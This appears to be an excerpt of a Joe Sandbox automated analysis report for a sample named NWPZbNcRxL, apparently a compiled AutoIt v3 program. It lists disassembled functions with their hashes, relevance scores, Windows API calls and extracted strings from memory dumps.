Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
Instruction ID: 86213bd6a11700aeb5927abeeb063952c0ff89bc97c0ae3f685910e858e704d3
Opcode Fuzzy Hash: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
Instruction Fuzzy Hash: ECD05EA016260879EC2D07208E4FF7A1109E380781FC4C14A7259C90C0EBD15D40A037

Function 00C687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C68389), ref: 00C687D1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
Instruction ID: 0ee946abdd76bea952c23f71c8427e7555c38549c773f4883e44232c2bb4d16a
Opcode Fuzzy Hash: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
Instruction Fuzzy Hash: 73D05E3226450EABEF018EA4DC05EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 00C3A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C3A12A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
Instruction ID: f05f6767ecc3c7bb64b0a94145c461a2b99be22b8da50cb36656a227a1fbff7f
Opcode Fuzzy Hash: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
Instruction Fuzzy Hash: D2A0123000010CE78A001B51EC085487F5CE6001907004021F40C80031873254514580

Function 00C28808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
Instruction ID: f1d4363f3f41f3aeed2e298e5ed1495baf382ee6008833d6fa18800ac386c413
Opcode Fuzzy Hash: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
Instruction Fuzzy Hash: 8F222330A05626CBDF38CA25E5D477CB7A1FF01304F38806AD9668B9A2DF709ED9D641

Function 00C321C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 0dc996623b212e0164e90183e55611423316ffced93e4bac2d795901b1b7a896
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 7DC174322251930ADF6E463AC47403EFAA15EA37B171E176DD8B3CB1D4EE20DB65D620

Function 00C325FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 2299369028f5d2c479d14c9a9ac98f9f86b5f783d3d18fb61d799ea941b5c32a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 3CC161332151930EDF2E463AC43413EBAA15EA37B1B1E176DD8B2DB1D5EE20CA25D660

Function 00C31978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 1f07ec0b8070b58addcdf0f1ae933ed900708375d03a185f7bb13063269968c0
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 83C163722251930EDF2E463A847413EFAA15EA37B171E176DD8B2CB1D4EE20CA659620

Function 010285E0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 779cbf677384b15486d497b8aead863588e440a5e8bec875fe1bedd73a5fe1d7
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8541D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 010284D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 6622484ce378f6f78a7f81e4df115ff4b7084a5178cfd3430bfdedbf2528635c
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: DC019278A00119EFCB44DF98C5909AEF7F5FB48310F20859AD949A7705E730AE51DB80

Function 01028470 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: b69985ab377aac4ce0929e4184090630050b971853f6b4db64df7a7dfe42edbf
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 43019278A01119EFCB44DF98C5909AEF7F5FB48310F2085DAD949A7701E730AE41DB80

Function 01026E50 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00C87806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C8785B
DeleteObject.GDI32(00000000), ref: 00C8786D
DestroyWindow.USER32 ref: 00C8787B
GetDesktopWindow.USER32 ref: 00C87895
GetWindowRect.USER32(00000000), ref: 00C8789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C879DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C879ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A35
GetClientRect.USER32(00000000,?), ref: 00C87A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C87A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87ABB
GlobalLock.KERNEL32(00000000), ref: 00C87AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AD3
GlobalUnlock.KERNEL32(00000000), ref: 00C87ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AE3
GlobalFree.KERNEL32(00000000), ref: 00C87AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CA2CAC,00000000), ref: 00C87B16
GlobalFree.KERNEL32(00000000), ref: 00C87B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C87B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C87B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87D7A

Strings

, xrefs: 00C87D00
static, xrefs: 00C87A75, 00C87BCC
DISPLAY, xrefs: 00C87BDD
AutoIt v3, xrefs: 00C87A2D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
Instruction ID: 29eed8d8ae1f0429484585596256f9ed5eb78c43b1ae1c58dd7e943b7aa517fb
Opcode Fuzzy Hash: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
Instruction Fuzzy Hash: C3026A71900115AFDB14EFA4CC89FAE7BB9EB49314F148259F915EB2A0D730EE42DB60

Function 00C9356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C9F910), ref: 00C93627
IsWindowVisible.USER32(?), ref: 00C9364B

Strings

DELSTRING, xrefs: 00C93749
GETSELECTED, xrefs: 00C938A3
SENDCOMMANDID, xrefs: 00C939DA
HIDEDROPDOWN, xrefs: 00C93700
CURRENTTAB, xrefs: 00C936BD
CHECK, xrefs: 00C9386D
SELECTSTRING, xrefs: 00C93806
UNCHECK, xrefs: 00C93883
SETCURRENTSELECTION, xrefs: 00C937B6
SHOWDROPDOWN, xrefs: 00C936E0
TABRIGHT, xrefs: 00C9369D
TABLEFT, xrefs: 00C93687
GETLINECOUNT, xrefs: 00C938C6
GETLINE, xrefs: 00C9399B
GETCURRENTLINE, xrefs: 00C938ED
ISCHECKED, xrefs: 00C93839
EDITPASTE, xrefs: 00C9395F
ADDSTRING, xrefs: 00C93716
FINDSTRING, xrefs: 00C93776
ISENABLED, xrefs: 00C9366B
GETCURRENTCOL, xrefs: 00C93928
ISVISIBLE, xrefs: 00C93637
GETCURRENTSELECTION, xrefs: 00C937E3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
Instruction ID: fec9d16f670e06af51590235920bcd75cdf2308544e6cc9e395731e901eb2764
Opcode Fuzzy Hash: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
Instruction Fuzzy Hash: D5D18C712183419BCF14EF10C869AAE77A5EF95344F144468F8929B3E2CB31EE4AEB45

Function 00C9A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C9A630
GetSysColorBrush.USER32(0000000F), ref: 00C9A661
GetSysColor.USER32(0000000F), ref: 00C9A66D
SetBkColor.GDI32(?,000000FF), ref: 00C9A687
SelectObject.GDI32(?,00000000), ref: 00C9A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A6C1
GetSysColor.USER32(00000010), ref: 00C9A6C9
CreateSolidBrush.GDI32(00000000), ref: 00C9A6D0
FrameRect.USER32(?,?,00000000), ref: 00C9A6DF
DeleteObject.GDI32(00000000), ref: 00C9A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00C9A731
FillRect.USER32(?,?,00000000), ref: 00C9A763
GetWindowLongW.USER32(?,000000F0), ref: 00C9A78E

Part of subcall function 00C9A8CA: GetSysColor.USER32(00000012), ref: 00C9A903
Part of subcall function 00C9A8CA: SetTextColor.GDI32(?,?), ref: 00C9A907
Part of subcall function 00C9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
Part of subcall function 00C9A8CA: GetSysColor.USER32(0000000F), ref: 00C9A928
Part of subcall function 00C9A8CA: GetSysColor.USER32(00000011), ref: 00C9A945
Part of subcall function 00C9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
Part of subcall function 00C9A8CA: SelectObject.GDI32(?,00000000), ref: 00C9A964
Part of subcall function 00C9A8CA: SetBkColor.GDI32(?,00000000), ref: 00C9A96D
Part of subcall function 00C9A8CA: SelectObject.GDI32(?,?), ref: 00C9A97A
Part of subcall function 00C9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
Part of subcall function 00C9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
Part of subcall function 00C9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
Part of subcall function 00C9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: b94fcf919aa25b0150c1677bbc82dd997e41928e7af02293829a3ecceb9e9733
Instruction ID: e7a6a56fbd6e9b9ab603534cce6a37f8cf6683c7f80edbaec43fc8a16a5d80b2
Opcode Fuzzy Hash: b94fcf919aa25b0150c1677bbc82dd997e41928e7af02293829a3ecceb9e9733
Instruction Fuzzy Hash: 12914B72408305EFCB109F64DC0CB6E7BA9FB88321F104A2EF9A2D61A0D771D945CB92

Function 00C12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00C12CA2
DeleteObject.GDI32(00000000), ref: 00C12CE8
DeleteObject.GDI32(00000000), ref: 00C12CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00C12CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00C12D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C4C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C4C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C4C89D

Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A

SendMessageW.USER32(?,00001053), ref: 00C4C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C4C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C912

Strings

0, xrefs: 00C4C731

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
Instruction ID: ba56c072d9f1c5abae851a6a5c22c52b16ef7a5ec6104ebceb9d4a2187650f6d
Opcode Fuzzy Hash: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
Instruction Fuzzy Hash: 9E129D34601201EFDB50CF24C8D8BA9BBE5BF05310F548569F9A5CB262CB31ED92EB91

Function 00C874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C874DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C8759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C875DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C875ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C87633
GetClientRect.USER32(00000000,?), ref: 00C8763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C87683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C87692
GetStockObject.GDI32(00000011), ref: 00C876A2
SelectObject.GDI32(00000000,00000000), ref: 00C876A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C876B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C876BF
DeleteDC.GDI32(00000000), ref: 00C876C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C876F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C8770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C87746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C8775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C8776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C8779B
GetStockObject.GDI32(00000011), ref: 00C877A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C877B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C877BB

Strings

static, xrefs: 00C8767D, 00C87795
msctls_progress32, xrefs: 00C8773C
DISPLAY, xrefs: 00C87688
AutoIt v3, xrefs: 00C8762B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
